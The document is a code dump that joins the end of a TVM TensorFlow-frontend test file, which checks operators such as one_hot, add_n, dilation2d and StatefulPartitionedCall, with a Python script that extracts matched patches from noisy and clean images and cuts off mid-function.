def test_forward_one_hot():
_test_forward_one_hot((3,), 3, 1, 0, -1, "int32")
_test_forward_one_hot((3,), 3, 1.0, 0.0, -1, "float32")
_test_forward_one_hot((2, 2), 5, 2, -2, 0, "int32")
_test_forward_one_hot((2, 2), 5, 0.5, -0.5, 1, "float32")
_test_forward_one_hot((3, 2, 4, 5), 6, 1, 0, 1, "int32")
_test_forward_one_hot((3, 2, 4, 5), 6, 1.0, 0.0, 0, "float32")
#######################################################################
# AddN
# ----------------------
def _test_forward_add_n(inputs):
tf.reset_default_graph()
with tf.Graph().as_default():
temp = []
for each in inputs:
temp.append(tf.placeholder(shape=each.shape, dtype=each.dtype))
output = tf.add_n(temp)
compare_tf_with_tvm([each for each in inputs], [each.name for each in temp], output.name)
def test_forward_add_n():
x = np.random.randint(1, 100, size=(3, 3, 3), dtype=np.int32)
y = np.random.randint(1, 100, size=(3, 3, 3), dtype=np.int32)
z = np.random.randint(1, 100, size=(3, 3, 3), dtype=np.int32)
m, n, o = x.astype(np.float32), y.astype(np.float32), z.astype(np.float32)
in0 = x
in1 = [x, y]
in2 = (x, y, z)
in3 = m
in4 = [m, n]
in5 = (m, n, o)
_test_forward_add_n(in0)
_test_forward_add_n(in1)
_test_forward_add_n(in2)
_test_forward_add_n(in3)
_test_forward_add_n(in4)
_test_forward_add_n(in5)
#######################################################################
# Sharing params case
# ----------------------
def test_sharing_node():
"""Test the sharing params case."""
np_data = np.random.uniform(size=(2, 2, 2)).astype("float32")
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, shape=(2, 2, 2), name="in_data")
axis = tf.constant([-1], dtype=tf.int32, name="axis")
mean0 = tf.reduce_mean(in_data, axis=axis, keepdims=False, name="mean0")
mean1 = tf.reduce_mean(in_data, axis=axis, keepdims=False, name="mean1")
out = tf.add(mean0, mean1, name="out")
compare_tf_with_tvm([np_data], ["in_data:0"], "out:0")
#######################################################################
# Unravel Index
# ----------------------
def _test_forward_unravel_index(inputs):
tf.reset_default_graph()
with tf.Graph().as_default():
temp = []
for each in inputs:
temp.append(tf.placeholder(shape=each.shape, dtype=each.dtype))
output = tf.unravel_index(temp[0], temp[1])
compare_tf_with_tvm([each for each in inputs], [each.name for each in temp], output.name)
def _test_forward_unravel_index_scalar(x, y, dtype="int32"):
tf.reset_default_graph()
with tf.Graph().as_default():
indices_1 = constant_op.constant(x, dtype=dtype)
dims_1 = constant_op.constant(y, dtype=dtype)
out_1 = array_ops.unravel_index(indices_1, dims_1)
compare_tf_with_tvm([], [], out_1.name)
def test_forward_unravel_index():
x = np.array([0, 1, 2, 3])
y = np.array([2, 2])
_test_forward_unravel_index([x, y])
x = np.array([0, 1, 2, 5])
y = np.array([2, 3])
_test_forward_unravel_index([x, y])
x = np.array([0, 1, 2, 5])
y = np.array([6])
_test_forward_unravel_index([x, y])
x = np.array([102, 300, 16])
y = np.array([10, 10, 9, 6])
_test_forward_unravel_index([x, y])
x = np.array([100])
y = np.array([10, 10, 9, 6])
_test_forward_unravel_index([x, y])
# Test scalar input
_test_forward_unravel_index_scalar(13, [1, 4, 5, 2])
#######################################################################
# Dilation2d
# ----------------------
def _test_dilation2d(tensor_in_sizes, filter_in_sizes, strides, dilations, padding):
"""One iteration of dilation2d with given shapes and attributes"""
total_size_1 = np.prod(tensor_in_sizes)
total_size_2 = np.prod(filter_in_sizes)
# Initializes the input tensor with array containing incrementing
# numbers from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
filter_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_filter = constant_op.constant(filter_array, shape=filter_in_sizes, dtype="float32")
nn_ops.dilation2d(in_data, in_filter, strides=strides, rates=dilations, padding=padding)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"Dilation2D:0",
no_gpu=True,
)
def test_forward_dilation():
_test_dilation2d([1, 18, 18, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "VALID")
_test_dilation2d([1, 15, 15, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "SAME")
_test_dilation2d([1, 5, 5, 1], [2, 2, 1], [1, 1, 1, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 5, 5, 1], [3, 3, 1], [1, 1, 1, 1], [1, 2, 2, 1], "VALID")
_test_dilation2d([1, 5, 5, 3], [3, 3, 3], [1, 1, 1, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 28, 28, 3], [5, 5, 3], [1, 2, 2, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 224, 224, 10], [8, 8, 10], [1, 1, 1, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 18, 18, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "SAME")
_test_dilation2d([1, 15, 15, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "VALID")
_test_dilation2d([1, 5, 5, 1], [7, 2, 1], [1, 3, 1, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 5, 5, 1], [3, 4, 1], [1, 2, 1, 1], [1, 2, 2, 1], "SAME")
_test_dilation2d([1, 5, 5, 3], [3, 3, 3], [1, 1, 4, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 28, 28, 3], [5, 6, 3], [1, 1, 2, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 224, 224, 10], [8, 8, 10], [1, 3, 1, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 3, 3, 1], [2, 2, 1], [1, 1, 1, 1], [1, 2, 2, 1], "SAME")
_test_dilation2d([1, 3, 3, 1], [2, 2, 1], [1, 1, 1, 1], [1, 1, 2, 1], "VALID")
def _test_identityn(data_np_list):
with tf.Graph().as_default():
data_tensors = []
data_tensors_name = []
for index, data_np in enumerate(data_np_list):
tensor_name = f"data_{index}"
data_tensors_name.append(tensor_name + ":0")
data_tensors.append(
tf.placeholder(shape=data_np.shape, dtype=str(data_np.dtype), name=tensor_name)
)
output = tf.identity_n(data_tensors)
output_names = [out.name for out in output]
compare_tf_with_tvm(
data_np_list,
data_tensors_name,
output_names,
)
@pytest.mark.parametrize(
"data_np_list",
[
(
[
np.array([[1, 1], [0, 3], [0, 1], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4, 5], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
]
),
(
[
np.array([[1, 1], [0, 3], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
np.array([True, False, True]),
]
),
(
[
np.array([]),
np.array([[]]),
]
),
],
)
def test_forward_identityn(data_np_list):
_test_identityn(data_np_list)
#######################################################################
# infinity ops
# ------------
def _verify_infiniteness_ops(tf_op, name):
"""test operator infinity ops"""
# Only float types are allowed in Tensorflow for isfinite and isinf
# float16 is failing on cuda
tf_dtypes = ["float32", "float64"]
for tf_dtype in tf_dtypes:
shape = (8, 8)
data = np.random.uniform(size=shape).astype(tf_dtype)
data.ravel()[np.random.choice(data.size, int(data.size * 0.5), replace=False)] = np.infty
data.ravel()[np.random.choice(data.size, int(data.size * 0.5), replace=False)] = np.nan
tf.reset_default_graph()
in_data = tf.placeholder(tf_dtype, shape, name="in_data")
tf_op(in_data, name=name)
compare_tf_with_tvm([data], ["in_data:0"], "{}:0".format(name))
def test_forward_isinf():
_verify_infiniteness_ops(tf.is_inf, "isinf")
def test_forward_isfinite():
_verify_infiniteness_ops(tf.is_finite, "isfinite")
def test_forward_isnan():
_verify_infiniteness_ops(tf.is_nan, "isnan")
def _test_spop_placeholder_without_shape_info():
with tf.Graph().as_default():
@function.Defun(*[tf.int32] * 2)
def Forward(x, y):
print(x.name)
print(y.name)
b = tf.add(x, y)
return b
pl1 = tf.placeholder(tf.int32, name="pl1")
pl2 = tf.placeholder(tf.int32, name="pl2")
pl3 = tf.placeholder(tf.int32, name="pl3")
data = np.array([[-1, 1], [2, -2]], dtype=np.int32)
data2 = np.array([[-2, 3], [4, -6]], dtype=np.int32)
data3 = np.array([[-2, 3], [4, -6]], dtype=np.int32)
z1 = gen_functional_ops.StatefulPartitionedCall(args=[pl1, pl2], Tout=[tf.int32], f=Forward)
z2 = z1 + pl3
compare_tf_with_tvm(
[data, data2, data3],
["pl1:0", "pl2:0", "pl3:0"],
["StatefulPartitionedCall:0", z2.name],
mode="vm",
init_global_variables=True,
)
def _test_spop_placeholder_with_shape_and_default_value():
with tf.Graph().as_default():
data = np.ones([1], dtype=int).astype(np.int32)
dataVar = tf.Variable(data, shape=data.shape)
pl1 = array_ops.placeholder_with_default(dataVar, shape=data.shape, name="pl1")
tpl = tf.convert_to_tensor(pl1, dtype=tf.int32)
@function.Defun(*[tf.int32])
def pl_with_default(pl):
return tf.expand_dims(tf.multiply(pl, pl), 0)
z = gen_functional_ops.StatefulPartitionedCall(
args=[tpl], Tout=[tf.int32], f=pl_with_default
)
compare_tf_with_tvm(
data, ["pl1:0"], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_placeholder_numpy_arange_feed():
with tf.Graph().as_default():
t1 = tf.placeholder(tf.int32, (3, 3, 3), "t1")
t1_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
t2 = tf.placeholder(tf.int32, (3, 3, 3), "t2")
t2_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
@tf.function
def add(x, y):
return tf.add(x, y, "add_t1_t2")
t3 = add(t1, t2)
compare_tf_with_tvm(
[t1_data, t2_data], ["t1:0", "t2:0"], [t3.name], mode="vm", init_global_variables=True
)
def _test_spop_placeholder_numpy_array_feed():
with tf.Graph().as_default():
t1_data = np.array([[-1, 1, 3], [2, -2, 4], [2, -3, 14]], dtype=np.int32)
t2_data = np.array([[-2, 1, 2], [12, -2, 14], [12, -3, 4]], dtype=np.int32)
t1 = tf.placeholder(tf.int32, name="t1")
t2 = tf.placeholder(tf.int32, name="t2")
@tf.function
def add(x, y):
return tf.add(x, y, "add_t1_t2")
t3 = add(t1, t2)
compare_tf_with_tvm(
[t1_data, t2_data], ["t1:0", "t2:0"], [t3.name], mode="vm", init_global_variables=True
)
def _test_spop_function_invocation_basic():
with tf.Graph().as_default():
def fun1(a):
return tf.multiply(a, a)
def fun2(b):
return tf.multiply(b, 10)
@tf.function
def fun3(x, y):
x = fun2(x)
y = fun1(y)
z = tf.add(x, y)
return z
t3 = fun3(tf.constant(10.5), tf.constant(20.4))
compare_tf_with_tvm([], [], [t3.name], mode="vm", init_global_variables=True)
def _test_spop_function_invocation_nested():
with tf.Graph().as_default():
t1 = tf.placeholder(tf.int32, (3, 3, 3), name="t1")
t1_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
t2 = tf.placeholder(tf.int32, name="t2")
t2_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
@tf.function
def myfunc(x, y):
return tf.add(x, y, "myfunc")
@tf.function
def myfunc2(x, y):
z = myfunc(x, y)
l = myfunc(z, y)
m = myfunc(l, z)
return tf.add(l, m, "myfunc2")
res1 = myfunc(t1, t2)
res2 = myfunc2(res1, t1)
compare_tf_with_tvm(
[t1_data, t2_data], ["t1:0", "t2:0"], [res2.name], mode="vm", init_global_variables=True
)
def _test_spop_function_invocation_no_autograph():
with tf.Graph().as_default():
@tf.function(autograph=False)
def fun1(a):
return tf.multiply(a, a)
@tf.function(autograph=False)
def fun2(b):
return tf.multiply(b, 10)
@tf.function
def fun3(x, y):
x = fun2(x)
y = fun1(y)
z = tf.add(x, y)
return z
t3 = fun3(tf.constant(10.5), tf.constant(20.4))
compare_tf_with_tvm([], [], [t3.name], mode="vm", init_global_variables=True)
def _test_spop_function_invocation_defun():
with tf.Graph().as_default():
def fun1(a):
return tf.multiply(a, a)
def fun2(b):
return tf.multiply(b, b)
@function.Defun(dtypes.float32, dtypes.float32, func_name="Fun3")
def fun3(x, y):
x = fun2(x)
y = fun1(y)
z = tf.add(x, y)
return z
op = gen_functional_ops.StatefulPartitionedCall(
args=[tf.constant(10.5), tf.constant(20.4)],
Tout=[dtypes.float32],
f=fun3,
name="SpopFnInvocation",
)
compare_tf_with_tvm([], [], "SpopFnInvocation:0", mode="vm", init_global_variables=True)
def _test_spop_arithmetic():
with tf.Graph().as_default():
@function.Defun(*[dtypes.int32] * 3)
def arithmetic(m, x, c):
z = tf.add(tf.multiply(m, x), c)
return z
m = tf.constant(10)
x = tf.constant(20)
c = tf.constant(2)
spopFn = gen_functional_ops.StatefulPartitionedCall(
args=[m, x, c], Tout=[tf.int32], f=arithmetic
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_control_flow():
with tf.Graph().as_default():
@function.Defun(*[dtypes.float32] * 2)
def Body1(x, y):
with ops.device("/job:localhost/replica:0/task:0/device:CPU:0"):
z = math_ops.multiply(x, y)
i = 0
while i < 10:
i += 1
if i == 5:
continue
z = math_ops.multiply(x, y * i)
return z
op = gen_functional_ops.StatefulPartitionedCall(
args=[constant_op.constant(32.0), constant_op.constant(100.0)],
Tout=[dtypes.float32],
f=Body1,
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_variables():
with tf.Graph().as_default():
const1 = tf.constant(10)
const2 = tf.constant(20)
var1 = tf.Variable(const1, dtype=tf.int32)
var2 = tf.Variable(const2, dtype=tf.int32)
@function.Defun(tf.int32, tf.int32)
def Forward(x, y):
return tf.multiply(x, y)
z = gen_functional_ops.StatefulPartitionedCall(
args=[var1, var2], Tout=[tf.int32], f=Forward
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", init_global_variables=True, mode="vm"
)
def _test_spop_constants():
with tf.Graph().as_default():
@function.Defun(*[dtypes.int32] * 2)
def constantsFn(x, y):
vv = tf.constant([2, 3, 4], name="vv")
z = tf.add(vv + x, y)
return z
a = tf.constant(20000, name="a")
b = tf.constant(40000, name="b")
spopFn = gen_functional_ops.StatefulPartitionedCall(
args=[a, b], Tout=[tf.int32], f=constantsFn
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_stateful():
# This test case is to test that TVM rejects any TF stateful operations
# (including Resource Variables) except StatefulPartitionedCall/PartitionedCall
# (as these two operators can still be used as container graphs to execute
# "stateless" operations internally.
tf.reset_default_graph()
with tf.Graph().as_default():
@tf.function
def FunctionWithStatefulOp_One(i):
b = tf.random.uniform(shape=[2, 4], maxval=10, dtype=tf.float32, seed=10)
y = tf.multiply(b, i)
return y
@tf.function
def FunctionWithStatefulOp(m, n):
a = tf.random.uniform(shape=[2, 4], maxval=10, dtype=tf.float32, seed=10)
x = tf.multiply(a, m)
y = FunctionWithStatefulOp_One(n)
z = tf.multiply(x, y)
return z
op = FunctionWithStatefulOp(constant_op.constant(1.0), constant_op.constant(2.0))
with pytest.raises(Exception) as execinfo:
compare_tf_with_tvm([], [], [op.name], init_global_variables=True, mode="vm")
assert execinfo.value.args[0].startswith("The following operators are not implemented")
def _test_spop_device_assignment():
# This test case is to test that TVM rejects inconsistent device assignment
# while using StatefulPartitionedCall/PartitionedCall operators which in case of TVM will
# be used as container graphs to internally execute "stateless" operations.
tf.reset_default_graph()
with tf.Graph().as_default():
def fun1(a):
with ops.device("/GPU:0"):
return tf.multiply(a, a)
def fun2(b):
with ops.device("/job:localhost/replica:0/task:0/device:CPU:1"):
return tf.multiply(b, b)
@function.Defun(dtypes.float32, dtypes.float32, func_name="Fun3")
def fun3(x, y):
with ops.device("/CPU:0"):
x = fun2(x)
with ops.device("/job:localhost/replica:0/task:0/device:CPU:2"):
y = fun1(y)
with ops.device("/job:localhost/replica:0/task:0/device:CPU:3"):
z = tf.add(x, y)
return z
op = gen_functional_ops.StatefulPartitionedCall(
args=[tf.constant(10.5), tf.constant(20.4)], Tout=[dtypes.float32], f=fun3
)
with pytest.raises(Exception) as execinfo:
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
assert execinfo.value.args[0].startswith("Found inconsistent Device assignment")
def _test_spop_resource_variables():
# This test case is to test that TVM rejects any graph containing
# resource variables with StatefulPartitionedOp.
tf.reset_default_graph()
with tf.Graph().as_default():
const1 = tf.constant(10)
const2 = tf.constant(20)
var1 = tf.Variable(const1, dtype=tf.int32, use_resource=True)
var2 = tf.Variable(const2, dtype=tf.int32, use_resource=True)
@tf.function
def resourceVariablesTest(x, y):
return tf.multiply(x, y)
op = resourceVariablesTest(var1, var2)
with pytest.raises(Exception) as execinfo:
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
assert execinfo.value.args[0].startswith("Graph is not frozen." " Provide a frozen graph")
def test_forward_spop():
_test_spop_stateful()
_test_spop_device_assignment()
_test_spop_resource_variables()
# Placeholder test cases
_test_spop_placeholder_without_shape_info()
_test_spop_placeholder_with_shape_and_default_value()
_test_spop_placeholder_numpy_arange_feed()
_test_spop_placeholder_numpy_array_feed()
# Function Invocation test cases
_test_spop_function_invocation_basic()
_test_spop_function_invocation_nested()
_test_spop_function_invocation_no_autograph()
_test_spop_function_invocation_defun()
# Test cases for various other TF constructs
_test_spop_arithmetic()
_test_spop_control_flow()
_test_spop_variables()
_test_spop_constants()
#######################################################################
# Dynamic input shape
# -------------------
def test_forward_dynamic_input_shape():
tf.reset_default_graph()
with tf.Graph().as_default():
data = tf.placeholder(tf.float32, name="data", shape=(None,))
out = data + 1
np_data = np.random.uniform(size=(2,)).astype("float32")
out_name = "add"
with tf.Session() as sess:
graph_def = tf_testing.AddShapesToGraphDef(sess, out_name)
tf_output = run_tf_graph(sess, np_data, "data:0", ["{}:0".format(out_name)])
# TODO(kevinthesun): enable gpu test when VM heterogeneous execution is ready.
for device in ["llvm"]:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
tvm_output = run_tvm_graph(
graph_def,
np_data,
["data"],
1,
target=device,
layout="NCHW",
out_names=[out_name],
mode="vm",
ignore_in_shape=True,
)
tvm.testing.assert_allclose(tvm_output[0], tf_output[0], rtol=1e-5, atol=1e-5)
def test_forward_dynmaic_rnn_lstmblockcell():
if package_version.parse(tf.VERSION) >= package_version.parse("2.0.0"):
return
total_series_length = 50000
truncated_backprop_length = 15
state_size = 4
echo_step = 3
batch_size = 5
num_layers = 5
def generateData():
x = np.array(np.random.choice(2, total_series_length, p=[0.5, 0.5]))
y = np.roll(x, echo_step)
y[0:echo_step] = 0
x = x.reshape((batch_size, -1)) # The first index changing slowest, subseries as rows
y = y.reshape((batch_size, -1))
return (x, y)
batchX_placeholder = tf.placeholder(tf.float32, [batch_size, truncated_backprop_length])
init_state = tf.placeholder(tf.float32, [num_layers, 2, batch_size, state_size])
state_per_layer_list = tf.unstack(init_state, axis=0)
rnn_tuple_state = tuple(
[
tf.nn.rnn_cell.LSTMStateTuple(
state_per_layer_list[idx][0], state_per_layer_list[idx][1]
)
for idx in range(num_layers)
]
)
# Forward passes
def lstm_cell():
return tensorflow.contrib.rnn.LSTMBlockCell(state_size)
cell = tf.nn.rnn_cell.MultiRNNCell(
[lstm_cell() for _ in range(num_layers)], state_is_tuple=True
)
states_series, current_state = tf.nn.dynamic_rnn(
cell, tf.expand_dims(batchX_placeholder, -1), initial_state=rnn_tuple_state
)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
x, y = generateData()
_current_state = np.zeros((num_layers, 2, batch_size, state_size))
start_idx = 0
end_idx = start_idx + truncated_backprop_length
batchX = x[:, start_idx:end_idx]
# Save current state for TVM
current_state_tvm = _current_state
_current_state, _states_series = sess.run(
[current_state, states_series],
feed_dict={batchX_placeholder: batchX, init_state: _current_state},
)
# Organize results and corresponding names
tf_output = [_states_series]
for c in _current_state:
tf_output.append(c.c)
tf_output.append(c.h)
name = [states_series.name.split(":")[0]]
for t in current_state:
name.append(t.c.name.split(":")[0])
name.append(t.h.name.split(":")[0])
graph_def = sess.graph.as_graph_def(add_shapes=True)
final_graph_def = graph_util.convert_variables_to_constants(sess, graph_def, name)
tvm_output = run_tvm_graph(
final_graph_def,
[batchX.astype("float32"), current_state_tvm.astype("float32")],
["Placeholder", "Placeholder_1"],
out_names=name,
num_output=len(name),
mode="vm",
disabled_pass=["FoldScaleAxis"],
)
# Compare result
for i in range(len(tf_output)):
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-5, rtol=1e-5)
#######################################################################
# Unique
# ------------
def _test_unique(n, dtype, is_dyn):
tf.reset_default_graph()
np_data = np.random.randint(100, size=n).astype(dtype)
with tf.Graph().as_default():
if is_dyn:
in_data = tf.placeholder(dtype, [n], name="in_data")
else:
in_data = tf.constant(np_data, dtype, name="in_data")
tf.unique(in_data)
if is_dyn:
compare_tf_with_tvm(np_data, "in_data:0", ["Unique:0", "Unique:1"], mode="vm")
else:
compare_tf_with_tvm(None, "", ["Unique:0", "Unique:1"])
def test_forward_unique():
"""test Unique"""
for dtype in ["int32", "int64"]:
for is_dyn in [False, True]:
_test_unique(50, dtype, is_dyn)
_test_unique(100, dtype, is_dyn)
#######################################################################
# Unique with counts
# ------------
def _test_unique_with_counts(n, dtype, is_dyn):
tf.reset_default_graph()
np_data = np.random.randint(100, size=n).astype(dtype)
with tf.Graph().as_default():
if is_dyn:
in_data = tf.placeholder(dtype, [n], name="in_data")
else:
in_data = tf.constant(np_data, dtype, name="in_data")
tf.unique_with_counts(in_data)
if is_dyn:
compare_tf_with_tvm(
np_data,
"in_data:0",
["UniqueWithCounts:0", "UniqueWithCounts:1", "UniqueWithCounts:2"],
mode="vm",
)
else:
compare_tf_with_tvm(
None, "", ["UniqueWithCounts:0", "UniqueWithCounts:1", "UniqueWithCounts:2"]
)
def test_forward_unique_with_counts():
"""test UniqueWithCounts"""
for dtype in ["int32", "int64"]:
for is_dyn in [False, True]:
_test_unique_with_counts(10, dtype, is_dyn)
_test_unique_with_counts(20, dtype, is_dyn)
#######################################################################
# check graph ir for nn.moments
# ------------
def test_moments():
g = tf.Graph()
shape = [4, 176, 8, 8]
dtype = "float32"
with g.as_default():
A = tf.placeholder(shape=shape, dtype=dtype, name="A")
B = tf.placeholder(shape=shape, dtype=dtype, name="B")
mean, variance = tf.nn.moments(A, [1], keep_dims=True)
normalised_input = (A - mean) / tf.sqrt(variance + 0.0005)
mod, _ = from_tensorflow(g.as_graph_def(add_shapes=True))
program = """
def @main(%A: Tensor[(4, 176, 8, 8), float32]) {
%527 = mean(%A, axis=[1], keepdims=True) /* moments/mean */;
%528 = subtract(%A, %527) /* sub */;
%529 = subtract(%A, %527);
%530 = multiply(%529, %529) /* moments/SquaredDifference */;
%531 = mean(%530, axis=[1], keepdims=True) /* moments/variance */;
%532 = add(%531, 0.0005f) /* add */;
%533 = sqrt(%532) /* Sqrt */;
divide(%528, %533) /* truediv */
}
"""
mod_golden = tvm.parser.parse('#[version = "0.0.5"]\n' + program)
tvm.ir.assert_structural_equal(mod["main"].body, mod_golden["main"].body, map_free_vars=True)
if __name__ == "__main__":
pytest.main([__file__])
|
extract_patches.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Imports
import numpy as np
from PIL import Image
from sklearn.feature_extraction import image
from tqdm import tqdm
import argparse
import os
import threading
def sample_patches_2d(img, shape, num_patches, offset_x = 0, offset_y = 0, random_seed = 0):
"""Overriding sklearn.feature_extraction.image.extract_patches_2d
Extract patches from a mono/tri chromatic image at random, or at a given location.
Input:
img: image, either tri-chromatic (:,:,3), or mono-chromatic (:,:,1)
shape: shape that needs to be extracted into, tuple of two ints (x, y)
num_patches: number of patches to extract
offset_x: make offset on x axis
offset_y: make offset on y axis
random_seed: seed to extract the image into
Output:
patches: an array of patches of shape (num_patches, shape, 3) or (num_patches, shape, 1)
"""
assert len(img.shape) == 2 or img.shape[2] == 3, "Image dimension mismatch, should be mono or tri chromatic, %s" % str(image.shape)
# Patch height and width
sh, sw = shape
assert type(sh) is int and type(sw) is int, "Error parsing shape"
# Image height and width
ih, iw = img.shape[0], img.shape[1]
# Effective height and width to sample at
eh = ih - sh
ew = iw - sw
hl = np.arange(eh)[0::2].astype(int)
wl = np.arange(ew)[0::2].astype(int)
hl += offset_y
wl += offset_x
np.random.seed(random_seed)
x = np.random.choice(wl, num_patches)
y = np.random.choice(hl, num_patches)
ats = list(zip(x, y))
patches = []
for at in ats:
patches.append(extract_single_patch_2d_at(img, shape, at))
patches = np.array(patches)
return patches
def extract_single_patch_2d_at(img, shape, at):
"""Extract an image patch from certain location of the given image.
Input:
img: image, either tri-chromatic(:,:,3) or mono-chromatic(:,:,1)
shape: shape that needs to be extract into, tuple of two ints (h, w)
at: Upper left corner of the patch at image coordinate, tuple of two ints (x, y).
Output:
patch: of shape (shape, 3) or (shape, 1)
"""
assert len(img.shape) == 2 or img.shape[2] == 3, "Image dimension mismatch, should be mono or tri chromatic, %s" % str(image.shape)
h, w = shape
x, y = at
assert type(h) is int and type(w) is int, "Error parsing shape"
assert type(x) is np.int64 and type(y) is np.int64, "Error parsing at %s %s" % (type(x), type(y))
assert x < img.shape[1] - w, "Exceeds image size x:%d, img.w-w:%d" % (x, img.shape[1] -w)
assert y < img.shape[0] - h, "Exceeds image size y:%d, img.h-h:%d" % (y, img.shape[0] -h)
if len(img.shape) == 2:
patch = img[y:y+h, x:x+w]
else:
patch = img[y:y+h, x:x+w, :]
return patch
def extract_patches_multi(Noisy_List, Clean_List, Noisy_out = './Images/NoisyPatches/', Clean_out = './Images/CleanPatches/',
patches_per_image = 10, patch_shape = (128 ,128), offset_x = 0, offset_y = 0):
"""Extract Images into patches (Multi-threaded ver.)
Input:
Noisy_List, Clean_List: A list of filenames for noisy and clean images
Noisy_out, Clean_out: Output directory for noisy and clean patches
File Output:
Patches of file written to Noisy_out and Clean_out
Return:
None
"""
assert len(Noisy_List) == len(Clean_List), "Sanity Check: Noisy, Clean images list length mismatch"
existing_patches_n = get_file_list(Noisy_out)
existing_patches_c = get_file_list(Clean_out)
if not len(existing_patches_c) == len(existing_patches_n):
raise IOError("Existing file count mismatch in output folder, possibility of mismatch of ref.")
count_base = len(existing_patches_c)
print ("Output Folder Index Starting from %d" % count_base)
"""Function onto worker thread:
Input:
Noisy, Clean: Path for Clean Images
local_c: local variable in place of count
local_i: local variable in place of i
Assumption:
count_base, Noisy_out, Clean_out, patches_per_image, patch_shape does not
change through out the extraction.
"""
def _extract(Noisy, Clean, local_i, random_seed):
clean_img = np.array(Image.open(Clean))
noisy_img = np.array(Image.open(Noisy))
try:
if not (clean_img.shape[0] == noisy_img.shape[0] and clean_img.shape[1] == noisy_img.shape[1]):
raise ValueError("Clean(%s) and Noisy(%s) image size mismatch" % (Clean_List[i], Noisy_List[i]))
except ValueError as e:
print (e)
return
patches_c = sample_patches_2d(clean_img, patch_shape, patches_per_image, offset_x, offset_y, random_seed)
patches_n = sample_patches_2d(noisy_img, patch_shape, patches_per_image, offset_x, offset_y, random_seed)
try:
if not patches_c.shape[0] == patches_per_image and patches_n.shape[0] == patches_per_image:
raise ValueError("Extracted Patches number mismatch: clean(%s), noisy(%s), patches_per_image(%s)" % (str(patches_c.shape[0]), str(patches_n.shape[0], str(patches_per_image))))
except ValueError:
return
for n in range(patches_c.shape[0]):
name_c = "c" + str(count_base + local_i + n).zfill(7) + ".tiff"
name_n = "n" + str(count_base + local_i + n).zfill(7) + ".tiff"
Image.fromarray(patches_c[n]).save(Clean_out + name_c)
Image.fromarray(patches_n[n]).save(Noisy_out + name_n)
random_state = np.random.randint(0, 10000, 1)
max_thread = 28
with tqdm(total = len(Noisy_List), desc = "Extracting Patches", unit = 'frames') as pbar:
for i in range(len(Noisy_List)):
# Block for too many threads created, no racing condition here.
while (threading.active_count() > max_thread):
pass
random_state += 1
threading.Thread(target = _extract, args = (Noisy_List[i], Clean_List[i], i * patches_per_image, random_state)).start()
pbar.update(1)
# Hold till all threads finishes.
while(threading.active_count() > 1):
pass
pbar.close()
def extract_patches(Noisy_List, Clean_List, Noisy_out = './Images/NoisyPatches/', Clean_out = './Images/CleanPatches/',
patches_per_image = 50, patch_shape = (128 ,128), offset_x = 0, offset_y = 0):
"""Extract Images into patches
Input:
Noisy_List, Clean_List: A list of filenames for noisy and clean images
Noisy_out, Clean_out: Output directory for noisy and clean patches
File Output:
Patches of file written to Noisy_out and Clean_out
Return:
None
"""
assert len(Noisy_List) == len(Clean_List), "Sanity Check: Noisy, Clean images list length mismatch"
existing_patches_n = get_file_list(Noisy_out)
existing_patches_c = get_file_list(Clean_out)
if not len(existing_patches_c) == len(existing_patches_n):
raise IOError("Existing file count mismatch in output folder, possibility of mismatch of ref.")
count = len(existing_patches_c)
print ("Output Folder Index Starting from %d" % count)
random_state = np.random.randint(0, 10000, 1)
with tqdm(total = len(Noisy_List), desc = "Extracting Patches", unit = 'frames') as pbar:
for i in range(len(Noisy_List)):
clean_img = np.array(Image.open(Clean_List[i]))
noisy_img = np.array(Image.open(Noisy_List[i]))
try:
if not (clean_img.shape[0] == noisy_img.shape[0] and clean_img.shape[1] == noisy_img.shape[1]):
raise ValueError("Clean(%s) and Noisy(%s) image size mismatch" % (Clean_List[i], Noisy_List[i]))
except ValueError as e:
print (e)
continue
patches_c = sample_patches_2d(clean_img, patch_shape, patches_per_image, offset_x, offset_y, random_state)
patches_n = sample_patches_2d(noisy_img, patch_shape, patches_per_image, offset_x, offset_y, random_state)
for j in range(patches_c.shape[0]):
name = "c" + str(count).zfill(7) + ".tiff"
Image.fromarray(patches_c[j]).save(Clean_out + name)
